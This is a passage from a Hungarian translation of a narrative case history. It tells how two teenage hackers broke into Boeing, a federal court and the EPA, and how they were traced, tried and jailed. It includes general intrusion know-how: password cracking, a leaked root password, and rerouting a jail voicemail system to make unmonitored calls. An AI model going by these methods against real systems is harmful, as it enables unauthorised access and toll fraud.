tartottak. – Minden egyes egyhetes kurzusra meghívtunk úgy
harmincöt rendfenntartó szakembert, és arról beszéltünk nekik, hogyan
kell lefoglalni egy számítógépet, hogyan kell megírni a házkutatási
parancsot, milyen ügyészségi vizsgálatokat lehet egy számítógépen
elvégezni, hogyan működik ez az egész. Tanult nálunk Howard
Schmidt is, aki később a Belbiztonsági Minisztériumhoz került, és ő
válaszolt az Elnöknek a kiberbűnözéssel kapcsolatos kérdésekre.
A kurzus második napján egyszer csak jelezni kezdett Don
csipogója. – Visszahívtam a rendszergazdát, Phyllist, aki azt mondta;
„Valami furcsa dolog történik ezen a gépen, és nem tudok rájönni, mi
az.” Egy rakás rejtett könyvtár, amelyek úgy tűnt, hogy jelszófájlokat
tartalmaznak, magyarázta. És egy Crack nevű program futott a
háttérben.
Ez rossz hír volt. A Crack egy a jelszavak titkosításának feltörésére
tervezett program. Szólistát vagy szótárlistát használva, illetve a szavak
olyan permutációval, mint a Bill1, Bill2, Bill3 próbálja meg felismerni
a jelszavakat.
Don elküldte a társát, Kent („a Unix biztonsági gurunkat”), hogy
nézze meg a dolgot. Körülbelül egy óra múlva Ken rácsipogott Donra,
és azt mondta neki: – Jobb lenne, ha feljönnél ide. Ez nem néz ki
valami jól. Több jelszót is feltörtek, és azok nem is a Boeinghez
tanoznak. És van itt egy olyan dolog is, amit különösképpen jól meg
kellene nézned.
Eközben Matt keményen dolgozott a Boeing számítógépes
hálózataiban. Miután sikerült rendszergazdai jogosultságokkal bíró
hozzáférést szereznie, „könnyű volt hozzáférni a többi accounthoz
azáltal, hogy belenéztem a cég emberei által használt gépekbe”.
Ezekben a fájlokban gyakran szoftverforgalmazók és a gép által
hívható más számítógépek telefonszámai voltak. – Tulajdonképpen az
ott levő többi host primitív telefonkönyve volt – mondja Matt.
Rövidesen a két hacker különböző cégek adatbázisaihoz szerzett
hozzáférést. – Rengeteg helyen rajta tartottuk a kezünket – mondja
Costa.
Mivel nem akarta otthagyni a szemináriumot, Don megkérte Kent,
hogy faxolja le, amit a rendszergazda képernyőjén lát. Amikor az
megérkezett, Don megkönnyebbült, hogy nem ismeri a felhasználói
azonosítókat. Az mindenesetre nagyon zavarta, hogy sok név kezdődött
így: „Bíró”. Hirtelen beugrott neki:
Azt gondoltam: – Uramisten! – Besétáltam a rendfenntartó
szakemberekkel teli tanterembe, és azt mondtam: – Felismerik ezeket a
neveket? – Felolvastam a listát. Az egyik szövetségi hivatalnok közölte,
hogy ezek a Seattle-i Kerületi Bíróság bírói. Mire azt mondtam: – Nos,
akkor itt van egy jelszófájl, 26 feltört jelszóval. – A szövetségiek arca
egészen elzöldült
.
Don látta, ahogy egy FBI ügynök, akivel korábban együtt dolgozott,
telefonálni kezd.
A Kerületi Bíróságot hívja, és a rendszergazdával beszél. Hallani a
vonal másik végén a fickót, ahogy mondja: – Nem, semmiképpen sem.
Nem csatlakozunk az Internethez. Nem tudják megszerezni a
jelszófájljainkat. Nem hiszem, hogy a mi gépünkről van szó. – Mire
Rich: – De, az a mi gépünk. Itt vannak a jelszófájlok. – A fickó egyre
csak hajtogatja: – Nem, az nem történhet meg. A mi gépeinkbe nem
lehet bejutni.
Don ránézett a kezében levő listára, és látta, hogy a rendszergazdai,
vagyis a legmagasabb szintű, csak a rendszergazdák által ismert jelszót
is feltörték. Megmutatta Rich-nek.
Rich az mondja a telefonba: – „2ovens” a rendszergazdai jelszavad?
– Néma csönd a vonal másik végén. Csupán egy „tompa ütődés”
hallatszik, ahogy a fickó az asztalba veri a fejét.
Amikor visszatért az osztályba, Don észlelte, hogy vihar készülődik.
– Azt mondtam, fiúk, itt az ideje egy kis valódi helyszíni gyakorlatnak.
Az osztály egy részével a nyomában Don felkészült a harcra. Először
is elment abba a Bellevue-ben levő számítógépes központba, ahol a
tűzfalat tárolták.
– Megtaláltuk az accountot, amely a Crack programot futotta,
amellyel a támadó ki– és bejelentkezett, illetve az IP-címet, ahonnan
jött.
Ekkorra a két hacker, akiknek a jelszófeltörő programjuk a Boeing
számítógépen futott, a Boeing rendszerének egyéb részeibe tették át
helyüket, pókhálószerűen keresve hozzáférést több száz Boeinges
számítógéphez.
Az egyik számítógép, amelyikhez a Boeing rendszere csatlakoztatva
volt, még csak nem is Seattle-ben volt. Egész pontosan a másik parton
volt. Costa szerint:
Egyike volt a Jet Propulsion (sugárhajtású) laboratórium
számítógépeinek a NASA Virgina államban levőLangley
Kutatólaboratóriumában, egy Cray YMP5 szuperszámítógép volt, egy
igazi koronaékszer Életünk egyik meghatározó pillanata volt ez.
Mindenféle dolog fut át az agyadon. Egyes titkok nagykőn gazdaggá
tehetnek, de akár halottá vagy igazán bűnössé is.
A szemináriumon levő fickók felváltva nézték a mókát a
számítógépközpontban. Ledöbbentek, amikor a Boeing biztonsági
csapata rájött, hogy a támadók hozzáférést szereztek a Cray-hez, és
Don is alig akarta ezt elhinni. – Nagyon gyorsan, egy vagy két óra alatt
képesek voltunk meghatározni azt a hozzáférési pontot, illetve a
tűzfalhoz való hozzáférési pontokat. – Eközben Ken virtuális csapdákat
állított fel a tűzfalon, hogy meghatározhassa, milyen más accountokat
törtek fel a támadók.
Don felhívta a helyi telefontársaságot, és kérte, hogy a támadók által
használt boeinges modemvonalakon „trap and trace” módszerrel
próbálják „befogni” a hívásokat. Ez a technika azt a számot adja meg,
ahonnan a hívásokat indítják. A telefonos szakemberek habozás nélkül
beleegyeztek. – A csapatunkhoz tartoztak és tudták, hogy ki vagyok,
így semmit sem kérdeztek. Ez az egyik előnye, hogy benne voltunk
ezekben a rendfenntartó csoportokban.
Dan laptopokat helyezett a modemek és a számítógépek közé,
„alapvetően azért, hogy minden billentyűleütést eltároljanak egy
fájlba”. Még Okidata nyomtatókat is csatlakoztatott minden gépre,
hogy „valós időben mindent kinyomtassanak. Bizonyítékként volt rájuk
szükség. Egy kinyomtatott lapot nem lehet úgy vitatni, mint az
elektronikus állományokat”. Ez nem meglepő, ha arra gondolunk, hogy
az esküdtszék minek hinne inkább: egy elektronikus fájlnak vagy egy
az incidens során kinyomtatott dokumentumnak.
A csoport néhány órára visszatért a szemináriumra, ahol Don
körvonalazta a helyzetet és a végrehajtott védőintézkedéseket. A
rendfenntartó szakemberek első kézből kaptak egyetemi szintű leckét a
számítógépes tudományból. – Visszamentünk, hogy tovább folytassuk
a munkát, és ellenőrizzük, hogy mit szereztünk meg idáig, és miközben
két szövetségi tiszttel és a társammal ott álltunk, a modem bekapcsolt.
Bingó, a srácok bejöttek, bejelentkeztek a felhasználói névvel – mondta
Don.
A helyi telefontársaság otthonukig követte le Mattét és Costát. A
csapat nézte, ahogy a hackerek bejelentkeztek a tűzfalba. Ezt követően
átmentek a Washingtoni Egyetemre, ahol bejelentkeztek Matt
Anderson felhasználói nevével.
Matt és Costa megtették azokat az óvintézkedéseket, amelyekről azt
gondolták, hogy megakadályozzák, hogy hívásaikat lenyomozzák.
Például ahelyett, hogy közvetlenül a Boeinget tárcsázták volna, a
Kerületi Bíróság számítógépeibe tárcsáztak be, és a Bíróságról
irányították át a hívást a Boeinghez. Úgy gondolták, hogy „ha valaki
figyelne is minket a Boeingnél, megszenvednének, mire kitalálnák,
honnan jön a hívás”, mondta Costa.
Nem sejtették, hogy minden mozdulatukat figyelték és rögzítették
onnan kezdve, hogy Costa betárcsázott a Bíróságra, onnan a
Boeinghez, majd a személyes iskolai accountjára.
Mivel annyira újak voltunk a [Kerületi Bíróság] rendszeren, illetve a
jelszó és a felhasználónév „public” volt, egyáltalán nem gondoltam,
hogy ez veszélyes lehet, vagy egyszerűen csak lusta voltam. Az a
közvetlen hívás vezette el őket a lakásomhoz, és ott ment minden tönkre.
Don csapata azt sem tudta, hová legyen örömében, amikor Matt
elkezdte a hallgatói accountján levő e-mailt olvasni. – A srác e-
mailjében minden benne volt a hackerkedéseiről, sőt, még a más
hackerektől kapott válaszokat is olvashatták.
A rendész tisztek hülyére röhögték magukat, mivel ezek az arrogáns
kölykök nem is gondoltak arra, hogy elkapták őket. Mi pedig „élőben”
néztük, ahogy bizonyítékokat készítenek saját maguk ellen.
Eközben Don kitépte a nyomtatóból a lapokat, és tanúként minden
jelenlevővel aláíratta, majd bizonyítékként zárta őket. – Kevesebb,
mint hat órával azután, hogy felismertük a támadást, máris
törvénysértésen kaptuk ezeket a fickókat.
Boeing vezetése nem nevetett. – Meg voltak rémülve az
ügyességüktől, és azt akarták, hogy véget vessenek a hackerek
tevékenységének. – Most azonnal kobozzák el a számítógépeiket,
hagyják abba az egészet.” Donnak sikerült meggyőznie őket, hogy
bölcsebb lenne várni. – Azt mondtam, hogy nem tudjuk, hány helyre
jutottak be ezek a srácok. Egy darabig figyelni kell őket, hogy mi is
folyik itt, és mit követtek el. – Ha figyelembe vesszük, hogy milyen
kockázatról volt szó, komoly elismerése volt Don szakmai tudásának,
hogy a vezetőség ebbe belement.

Megfigyelve

A szemináriumon részt vevő egyik szövetségi tiszt engedélyt szerzett


Matt és Costa telefonjának lehallgatására. Ez azonban csak egy része
volt az erőfeszítéseiknek. Ekkorra a szövetségi kormány már igen
komolyan vette az ügyet. Műveletük egy kémfilmre vagy egy bűnügyi
thrillerre emlékeztetett: csoportokban FBI ügynököket küldtek az
egyetem területére. Magukat hallgatóknak tettetve mindenhova
követték Mattét, feljegyezték tetteit, hogy utóbb képesek legyenek
beazonosítani, hogy egy adott időpontban a campus mely számítógépét
használta. Máskülönben egyszerűen azt állíthatta volna, hogy: – Az
nem én voltam – nap mint nap rengetegen használják azt a gépet.
– Erre korábban egy másik ügyben volt már példa.
Ami a Boeinget illeti, a biztonsági csapat minden olyan
óvintézkedést megtett, amire csak gondolni tudtak. A cél nem
egyszerűen az volt, hogy távol tartsák fiúkat, hanem hogy közelről
figyeljék őket, bizonyítékokat gyűjtsenek, ám eközben biztosítsák,
hogy semmilyen kárt ne okozzanak. Don így mesél erről: – Úgy
állítottuk be az összes számítógépünk fő belépési pontjait, hogy vagy a
rendszergazda vagy maga a számítógép ránk csipogjon és értesítsen
bennünket, ha valami történik. – A csipogó hangja lett a „csatatér”
hívójele. A csapat tagjai azonnal értesítették a hívólistán levő
kiválasztott személyeket, és tudatták velük, hogy a hackerek ismét
éppen préda után kutatnak. Don csoportja több alkalommal is az
Interneten, elektronikusan követte nyomon Matt és Costa a
Washingtoni Egyetemen keresztül megtett lépéseit – amiről az egyetem
vezetőségét és szakembereit előre tájékoztatták. Olyan volt, mintha a
két srác mellett ülnének, miközben ők a betöréseket végrehajtották.
Don úgy döntött, hogy még négy vagy öt napig figyelik őket, mert
„alapjában véve elég jól behatároltuk mozgásukat, és semmi olyat nem
tettek, amit különlegesen veszélyesnek tartottam volna, noha komoly
dolgokhoz volt hozzáférésük, és ha akartak volna, jelentős károkat
okozhattak volna”.
De Costa hamarosan rájött, hogy valami készülődik:
Az egyik este barátnőmmel a lakásomban üldögéltünk, és tévét
néztünk. Nyáreste volt, és nyitva volt az ablak, és fura, de barátnőm
kinézett az ablakon... és egy autót vett észre a Pay & Save áruház
parkolójában. Úgy egy óra múlva megint kinézett, és azt mondta: „Van
ott kint egy kocsi, benne emberekkel, és már egy órával ezelőtt is itt
voltak.”
Costa lekapcsolta a tv-t és a villanyt, és videóra vette, ahogy az FBI
ügynökök figyelik a lakását. Kicsit később egy második kocsit látott az
első mellé állni. A két kocsiban ülők megbeszéltek valamit, majd mind
elmentek.
Következő nap egy csapat ügynök jelent meg Costa lakásában.
Amikor rákérdezett, elismerték, hogy nincsen elfogatóparancsuk,
azonban Costa együttműködési szándékáról akarta biztosítani őket, így
nem tiltakozott az ellen, hogy kérdezzenek tőle. Akkor sem tiltakozott,
amikor arra kérték, hogy hívja fel Mattét, és beszéltesse a
mobiltelefonos tetteikről, miközben ők rögzítették a beszélgetést.
Miért volt hajlandó felhívni legjobb barátját, és illegális tetteikről
beszélgetni, miközben az ügynökök mindent hallottak? Egyszerű:
egyik este, amikor viccelődtek, és a „Mi lenne, ha” játékot játszották,
felkészültek egy olyan helyzetre, amelyben veszélyes lehet szabadon
beszélni, ezért megállapodtak egy kódban. Ha bármelyikük
becsempészi a „kilenc, tíz”-et a beszélgetésbe, akkor az azt jelenti,
hogy veszély, figyelj arra, hogy mit mondasz.” (A könnyű
megjegyezhetősége miatt választották ezt a számot, amely eggyel
kisebb, mint a 911-es segélyhívószám.)
Így lehallgatott telefonján, amelyre ráadásul a hangrögzítő is rá volt
kapcsolva, Costa tárcsázta Mattét: – Hívtlak pár perce, úgy kilenc
tízkor, de nem értelek el – mondta neki.

Összeomlás

Ekkorra a Boeing biztonsági csapata felfedezte, hogy a hackerek


nem csak a Kerületi Bíróságra jutottak be, hanem a Környezetvédelmi
Hivatalba (Environmental Protection Agency – EPA) is. Don Boelling
tudatta az EPA-val a rossz hírt. Akárcsak a Kerületi Bíróság
rendszergazdája, az EPA szakemberei sem akarták elhinni a rendszerük
elleni támadás sikerességét.
Mondtuk nekik, hogy a gépeiket feltörték, és ez számukra hihetetlen
volt. Azt mondogatták: „Nem, nem.” Odaadtam nekik a jelszófájlt a
10-15 feltört jelszóval, és megmondtam nekik a rendszergazdai jelszót.
Teljesen készen lettek, mivel kiderült, hogy a szerte Amerikában
levőmintegy 600 számítógépük ugyanazzal a felhasználói névvel volt az
Internethez csatlakoztatva. Ez egy rendszergazdai jogosultságú account
volt, és mindenkinek ugyanaz volt a jelszava.
A számítógép-biztonsági szemináriumot látogató rendfenntartó
szakemberek sokkal tovább jutottak, mint gondolták volna. – Azoknak,
akik nem jöttek ki velünk a helyszínre – mondta Don mindennap a
tanteremben számoltunk be a lépéseinkről. Első kézből értesültek arról,
hogyan áll az ügy.

Kísért a múlt

Mivel Dont lenyűgözte a hackerek ügyessége, meglepve szerzett


tudomást arról, hogy a fiúk mindössze két hónappal korábban más
vádak miatt bíróság előtt álltak, és ennek eredményeképpen Costát 30
napi közcélú munkavégzésre ítélték.
És ennek ellenére megint áthágták a törvényt, mintha sérthetetlenek
lennének. De miért? Costa elmagyarázta, hogy ő és Matt már aggódtak,
mivel eredetileg sokkal többről volt szó, mint amennyire az ügyészek
rájöttek.
Olyan volt, mint egy nagy jéghegy, amelynek csak a csúcsát találták
meg. Nem tudták, hogy mit csináltunk a mobiltelefonokkal, nem tudták,
hogy hitelkártyaszámokat szereztünk meg, és nem látták át annak a
mélységét, amiért elkaptak bennünket. Mivel Matt és én már korábban
beszéltünk erről, megegyeztünk, hogy mit fogunk mondani nekik. És így
bevallottuk nekik ezt a számítógépes törvénysértést, ami csak egy „ha-
ha” volt számunkra. Butaság volt.

Benne vagyunk a hírekben

Don éppen Bellevue-ből a Boeing központi létesítményébe hajtott,


ahol az irodája is van, amikor szinte sokkot kapott. – A KIRÓ rádióadó
hírei mentek a kocsiban, és hirtelen azt a hírt hallom, hogy két hacker
betört a Boeinghez, és elkezdődött a szövetségi nyomozás.
Káromkodtam egyet magamban.
A történetet egy Boeing alkalmazott szivárogtatta ki, aki – mint
később Don kiderítette – nem volt megelégedve azzal a döntéssel, hogy
ahelyett, hogy azonnal letartóztatnák őket, egyelőre csak figyeljék Matt
és Costa tevékenységét. Don besietett az irodájába, és összehívta az
érintetteket. Azt mondtam nekik, „nézzétek, az egész ügy napvilágra
került. Benne van a hírekben. Tennünk kell valamit most azonnal.” Ott
volt Howard Schmidt, aki a számítógépekre vonatkozó házkutatási
parancsok szakértője lévén közbelépett és segített nekik, hogy a dolog
rendben legyen – nem is volt semmilyen gond.
Don igazából nem volt túl feszült a hír kiszivárgása miatt. – Nagyon
közel voltunk már ahhoz, hogy rajtuk üssünk. Rengeteg, több tonnányi
bizonyítékunk volt már a fiúk ellen. – Gyanította azonban, hogy
többről van szó, mint ami idáig napvilágot látott. – Volt néhány dolog,
amiről gondoltuk, hogy benne voltak, például a hitelkártyacsalásokban.
Később elkapták őket ezért is. Azt hiszem, hat hónappal vagy egy
évvel később volt, hogy a titkosszolgálat letartóztatta őket.

Letartóztatva

Costa tudta, hogy hamarosan sor kell hogy kerüljön erre, így nem
lepődött meg a lakásajtaján hallható nehéz kopogáson. Ekkorra már
megszabadult négy laptoptól, amelyek tele voltak terhelő
bizonyítékkal. Ennél a pontnál fogalma sem volt arról, hogy – hála Don
Boellingnek – a szövetségieknek a kezükben volt az összes bizonyíték,
amire valaha is szükségük lesz ahhoz, hogy őt és Mattét elítéljék.
Matt emlékszik, hogy a szülei otthonában látta a tévében a hírt a
Boeingnél történt számítógépes betörésről. Este 10 körül kopogtak a
bejárati ajtón. Két FBI ügynök volt. Körülbelül két órán keresztül
kérdezgették őt az ebédlőben, miközben a szülei az emeleten aludtak.
Matt nem akarta felébreszteni őket. Ahhoz túlságosan meg volt
rémülve.
Don Boelling szeretett volna ott lenni a letartóztatáson is, de nem
lehetett. A jó kapcsolatai ellenére nem hívták. – Nem voltak túlságosan
oda az ötletért, hogy civilek legyenek ott magánál az elfogásnál.
A Boeinget nyugtalansággal töltötte el, amikor megtudták, hogy az
egyik hacker neve megegyezett egy alkalmazottjuk nevével. Matt sem
örült, hogy az apja is belekeveredett. – Mivel Apa a Boeingnél
dolgozott és ugyanaz volt a nevünk, őt is kikérdezték. – Costa gyorsan
leszögezte, hogy arra ügyeltek, hogy ne a Matt apjától származó
információk felhasználásával jussanak be a Boeingbe. – Teljesen
kihagyta az apját a dolgokból, és a kezdetek óta ügyelt arra, hogy ne
keverje bele, már akkor is, amikor még fel sem merült bennünk, hogy
valaha bajba kerülhetünk.
Don kissé mérges lett, amikor az FBI seattle-i irodájának különleges
ügynökét az ügy kirobbanása után meginterjúvolták. Az egyik
tévériporter azt kérdezte tőle, hogy nyomozták le és kapták el a
hackereket. Az ügynök valami ilyesmit válaszolt: – Az FBI olyan
technikai lépéseket és technikákat használt, amelyeket túl bonyolult
lenne itt elmagyarázni. – Don azt gondolta magában: – Ezt a
baromságot. Semmit nem csináltatok! Mi voltunk azok! – Egy jól
koordinált csoport működött együtt: a Boeing szakemberei, más
vállalatok szakértői, a
Kerületi Bíróság emberei, helyi, állami és szövetségi rendfenntartó
szervek ügynökei. – Ez volt az első példa az ilyenfajta
együttműködésre. Igazi csapatmunka volt.
Szerencsére Matt és Costa kevés kárt okoztak ahhoz képest, hogy
milyen felfordulást okozhattak volna. – Ami magát a Boeinget illeti,
igazából szinte semmit nem követtek el – ismerte el Don. A cég jól
megúszta, azonban biztos akart lenni benne, hogy megtanulták a leckét.
– Beismerték a bűnösségüket, hiszen tulajdonképpen tetten értük őket.
Semmiképpen nem úszhatták meg – emlékszik vissza Don,
megelégedéssel a hangjában.
A vádakat most is csökkentették; ez alkalommal a többször
elkövetett bűntett vádját „számítógépes törvényszegésre” mérsékelték.
A két fiú megúszta azzal, hogy az orrukra koppintottak: 250 óra
közcélú munkavégzésre ítélték őket, illetve öt év próbaidőre, amely
alatt nem használhattak a számítógépet. A dolog legkeményebb része a
kártérítés volt: 30 ezer dollárt kellett fizetniük, nagy részét a
Boeingnek. S noha egyikük sem volt már fiatalkorú, a fiúk kaptak még
egy esélyt.

Vége a jó szerencsének

Nem tanultak a leckéből.


Costa: Ahelyett, hogy teljesen leálltunk volna, ostoba kölykök
voltunk, illetve nem is annyira ostobák, mint naivak, abban az
értelemben, hogy nem fogtuk fel, hogy milyen bajba kerülhetünk. Nem
annyira a mohóság vagy sóvárgás, inkább a mobiltelefon birtoklásának
az öröme, illetve az, hogy tetszés szerint használhattuk, ezek vezéreltek
minket.
Matt: Akkoriban ez még nagy dolog volt. Nagyon gizda volt, akinek
volt egy.
De a betörések, amelyek miatt az igazságszolgáltatási rendszer
felfigyelt Matt-re és Costára, hamarosan véget értek. És teljesen más
okból, mint amire számíthattak volna: mindenekelőtt féltékenységből.
Costa elmesélte, hogy az akkori barátnője azt hitte, hogy megcsalja
őt egy másik nővel. Semmi ilyesmiről szó sem volt, mondja Costa; a
másik hölgy „csak barát volt, semmi több”. Amikor nem volt hajlandó
megszakítani vele a kapcsolatát, a barátnője, legalábbis Costa így
gyanítja, felhívta a hatóságokat, és azt jelentette, hogy a „Boeing
hackerek lopott számítógépeket árulnak”.
Amikor a nyomozók megjelentek az anyja otthonánál, Costa nem
volt ott, az anyja azonban igen. – Hogyne, jöjjenek be – mondta nekik,
hiszen biztos volt benne, hogy nem lesz semmi baj.
Semmilyen lopott holmit nem találtak. Ez volt a jó hír. A rossz hír
viszont az volt, hogy találtak egy földre esett papírdarabot, amit a
szőnyeg részben eltakart. Egy telefonszám és számjegyek voltak rajta,
amely utóbbit az egyik nyomozó elektronikus sorozatszámként
azonosított. A telefontársaságnál lefolytatott ellenőrzés során kiderült,
hogy a szám egy illegálisan használt mobiltelefonhoz tartozott.
Amikor Costa tudomást szerzett az anyja otthonában tartott
rajtaütésről, úgy döntött, hogy eltűnik.
Öt napig menekültem a Titkosszolgálat elől – nekik volt bíráskodási
joguk a mobiltelefonos törvényszegések esetén. Szökevény voltam. Egy
barátom seattle-i lakásában tartózkodtam, tulajdonképpen kerestek is
engem a lakásban, de a kocsim még az előzőtulajdonos nevén volt, így
nem kaptak el.
Az ötödik vagy hatodik nap beszéltem az ügyvédemmel, vele együtt
besétáltam a próbaidős tiszt irodájába, és feladtam magam.
Letartóztattak és elvittek.
A Titkosszolgálat előli menekülés stresszes időszak volt.
Mattét is begyűjtötték. A két fiú a Seattle-i King megyei börtön két
különböző emeletén találta magát.
Börtönphreaking

Ez alkalommal nem lesz tárgyalás, tudták meg a fiúk. Ahogy a


nyomozás véget ér és az ügyészség összeállítja a nyomozati iratokat, a
pár egy szövetségi bíró elé került a próbaidő megsértése miatt. Nincs
tárgyalás, nincs lehetőség védekezni, és nem sok remény van a
kegyelemre.
Mind e közben mindkettőjüket részletesen kikérdezték. Ismerték a
dörgést: tartsd külön a rossz fiúkat, és kapd őket rajta, ha nem ugyanazt
mondják.
Matt és Costa úgy találta, hogy – legalábbis számukra – a börtön
sokkal keményebb hely, mint a fogda volt. A megyei börtön a
legrosszabb, rosszabb mindennél. Néhány embertől meg voltam
rémülve – mondja Costa. – Még egy verekedésbe is belekerültem. Ha
nem ugatsz vissza, felfalnak. – Matt emlékszik, hogy megütötték. – Azt
hiszem, azén volt, mert nem adtam át a telefont. Rendben, a lecke
megtanulva.
A börtön más miatt is kémény volt. Costa így emlékszik vissza:
Nem tudtuk, mi lesz, mert már korábban bajba kerültünk, és tudtuk,
hogy most nagyobb a baj. Inkább az ismeretlentől, mint a
börtöntársaktól való félelem volt ez. Csak annyit mondtak, „csukjátok
le őket”, nincs óvadék, nincs semmi sem. Szövetségi ügy volt.
Elképzelésünk sem volt, hogy hova visznek innen, teljes mértékben
hűvösre tettek minket.
A börtönökben általában kétféle telefon van: fizetős telefon,
amelyeken a beszélgetéseket folyamatosan figyelik, hogy a
fogvatartottak ne tervelhessenek ki illegális dolgokat, illetve a
közvetlenül a kirendelt védők irodájához csatlakozó telefonok, hogy a
fogvatartottak beszélhessenek az ügyvédjeikkel.
A seattle-i börtönben a kirendelt védőket kétszámjegyű kódok
listájából kiválasztva lehet hívni. Matt a következőket mesélte: – De ha
a hivatalos idő után hívod őket, kihez jutsz? A hangpostarendszerükbe
kerülsz, és annyi nyomógombot nyomhatsz meg, amennyit csak akarsz.
– Elkezdett ismerkedni a hangpostarendszerrel. Felismerte, hogy egy
Meridián rendszerről van szó, és ezt a típust ő és Costa is jól ismerték,
így be tudta programozni, hogy hívásait egy külső vonalra továbbítsa. –
Beállítottam egy nyolcas számú menüpontot, amit az automata nem
használt. Ezt követően egy helyi számot, illetve egy általam ismert
hatjegyű kódot tárcsáztam. Innen már a világ bármely pontját
felhívhattam.
Noha a telefonokat este 8 órakor kikapcsolták, a kirendelt védők
vonalát mindig bekapcsolva hagyták. – Egyszerűen egész este
játszottunk a telefonokkal, és senki sem várt ott, hogy használja őket,
mivel azt hitték, hogy ki vannak kapcsolva – mondja Costa. – Azt
gondolták, hogy bolond vagy, ott ülsz a telefonnal. Szóval tökéletesen
működött.
Miközben Costa felfedezte, hogy indíthat külső hívásokat,
éjszakánként Matt az ő egységében levő telefonon végzett
„kutatómunkát”. Megtalálta egy pennsylvaniai telefontársaság egy
„régi hurokhoz tartozó híd számát”, amely lehetővé tette
mindkettőjüknek, hogy egy telefontársaság tesztszámát felhívta
beszéljenek egymással.
A két fiú órákat töltött azzal, hogy felügyelet nélkül telefonáljanak
egymásnak. – Lehetőségünk nyílt arra, hogy a kihallgatások előtt
megbeszéljük az ügyet. Ez nagyon, igazán nagyon jól jött – mondja
Costa. Matt hozzáteszi: – Mindig mindent megbeszéltünk, amit a
másikunknak mondtak. Azt akartuk, hogy minden válaszunk hiteles
legyen.
A fogva tartottak között híre ment, hogy a két kölyök varázsol a
telefonokkal.
Costa: Kezdtem elhízni, mert cserébe a szabad telefonhívásokért a
többiek nekem adták az ebédjüket.
Matt: Én pedig fogyni kezdtem, mert ideges voltam. Ott ültem ezzel a
rakás bűnözővel, és egyáltalán nem tetszett, hogy telefonhívásokhoz
segítettem őket.
Börtönben ülnek, miközben illegális telefonhívások bonyolításával
tört vényt sértenek, és a vallomásukat egyeztetik annak érdekében,
hogy megtévesszék az ügyészeket. Ez bármely hacker számára rém
mulatságosan hangzik. Matt és Costa számára ez azonban azt jelentette,
hogy további vádakat kockáztatnak az eddigieken túlmenően.
Végül az összejátszás sem segített. A tények ellenük szóltak, és ez
alkalommal egy olyan bíró elé kerültek, aki nem elégedett meg azzal,
hogy az orrukra koppint. „Egy év és egy nap” szövetségi börtönben
letöltendő szabadságvesztésre ítélték őket, amelybe beszámították a
megyei börtönben már eltöltött időt. Az egy éven felüli extra egy nap
igen komoly előnnyel járt a számukra. A szövetségi törvények szerint
ez tette őket jogosulttá arra, hogy jó magaviselet esetén 54 nappal
hamarabb szabaduljanak.
Három és fél hónapig az óvadék melletti szabadlábra helyezés
lehetősége nélkül tartották fogva a két fiút, majd igen szigorú feltételek
mellett óvadék ellenében elengedték őket a bíró ítélethozataláig.
Donnak igaza volt: ez alkalommal nem volt kegyelem.

A büntetés letöltése

Mattét az Oregon állambeli Sheridan Campbe, míg Costát a


Kalifornia állambeli Boron Szövetségi Börtönbe küldték. – Azért
szövetségibe, mert a próbaidő megsértésével szövetségi bűntényt
követtünk el – mondja Costa.
Ennek ellenére egyiküknek sem voltak ezek „nehéz idők”. Costa így
emlékszik vissza:
Tudtam, hogy jó dolgom van. Ez egy olyan börtöntábor volt,
amelyben még úszómedence is volt. Mojave sivatag kellős közepén volt,
a maga módján egész szép volt. Nem volt kerítés, csak egy sárga vonal
a sivatag közepén. Egyike volt azoknak a helyeknek, ahol három
szenátor is volt. Volt ott benn velem egy srác, aki híres étteremláncot
indított.
Boron volt az utolsó szövetségi intézmény, amelyben volt medence,
és Costa később hallotta, hogy Barbara Walters televíziós riportja
eredményeképpen a medencét nem sokkal szabadulása után
betemették. Személy szerint én megértem, hogy egy új börtön
építésénél nem költik az adófizetők pénzét úszómedencére, de azt nem
értem, hogy egy létezőt miért kell lerombolni.
A Sheridan börtönben Matt találkozott egy másik fogva tartottal, aki
a Boeing egy korábbi felsővezetője volt. – Valamilyen sikkasztásért
vagy egyéb fehérgalléros bűncselekményért került bajba. – Valahogy
ironikusnak tűnt a dolog.
Costát és a többi boroni rabot a börtön elviselhetetlenül felmelegedő
buszában rendszeresen átvitték a közeli Edwards Légibázisra, hogy a
félórás út után dolgoztassák őket. – A katonai hangárba raktak engem,
ahol volt egy VAX szerverük. Még számítógép közelében sem volt
szabad lennem. – Figyelmeztette az őrmestert. – Elmeséltem neki a
történetemet, mire annyit mondott, „Ó, csak csináld.” – Costa nem
vesztegette az idejét, hogy megismerkedjen a katonai számítógéppel.
Mindennap az IRC-n lógtam és chateltem, miközben le voltam ültetve.
Nagy sebességgel töltöttem le a Doomot. Hihetetlen volt, nagyszerű!
Egy alkalommal azzal bízták meg Costát, hogy takarítson ki egy
precíziós berendezésekkel teli, katonai szempontból fontos
kommunikációs teherautót. – Egyszerűen nem akartam elhinni, hogy
ilyen dolgok közelébe engednek bennünket.
Bizonyos szempontból tréfásnak, majdnem viccnek tűnhet a fiúk
által börtönben töltött idő. De nem volt az. Minden bent eltöltött hónap
az életből elvesztegetett hónap volt, amikor nem tanultak, amit távol
töltöttek szeretteiktől és mindazoktól, akikkel lenni szerettek volna. A
rab minden reggel azzal kezdi a napját, hogy elmereng azon, vajon ma
is ökölharccal kell-e megvédenie magát és tulajdonát. A börtön és a
fogház rémisztő tud lenni.

Hogyan élnek ma

Szabadulásuk után egy évtizeddel mindketten hétköznapi életet


élnek. Matt jelenleg egy nagy San José-i vállalatnál dolgozik Java
alkalmazásfejlesztőként. Costának saját cége van, és elég elfoglaltnak
tűnik, „digitális megfigyelő-rendszereket állít be”. Olyan munkát talál,
amely illik hozzá; a munkájukat unottan végző emberek irigyek
lennének, mert ő – ahogy mondja – „élvezi minden percét”.

BETEKINTÉS

Hihetetlennek tűnik a mai világban, hogy a hackerek még mindig


milyen könnyen bejutnak oly sok céges weboldalra. A betörésekről
hallható rengeteg történet, a biztonsággal kapcsolatos rengeteg
aggodalom, az elkötelezett és szakképzett biztonsági személyzet és a
nagy és kis cégeknél egyaránt megtalálható tanácsadók mindezek
fényében egészen megdöbbentő, hogy két tizenéves fiú elég ügyes volt
ahhoz, hogy utat találjon egy szövetségi bíróságra, egy neves
hotelláncba és a Boeing Aircraftbe.
Úgy gondolom, hogy ennek részben az az oka, hogy sok hacker
követi azt az utat, amit én is bejártam, nevezetesen rengeteg időt
töltenek azzal, hogy a számítógépes rendszerekről, operációs
rendszerszoftverekről, alkalmazásokról, hálózatokról stb. minél többet
megtudjanak. Főként autodidakta módon képezik magukat, azonban
részben egy informális, ám annál hatékonyabb „oszd meg a tudást”
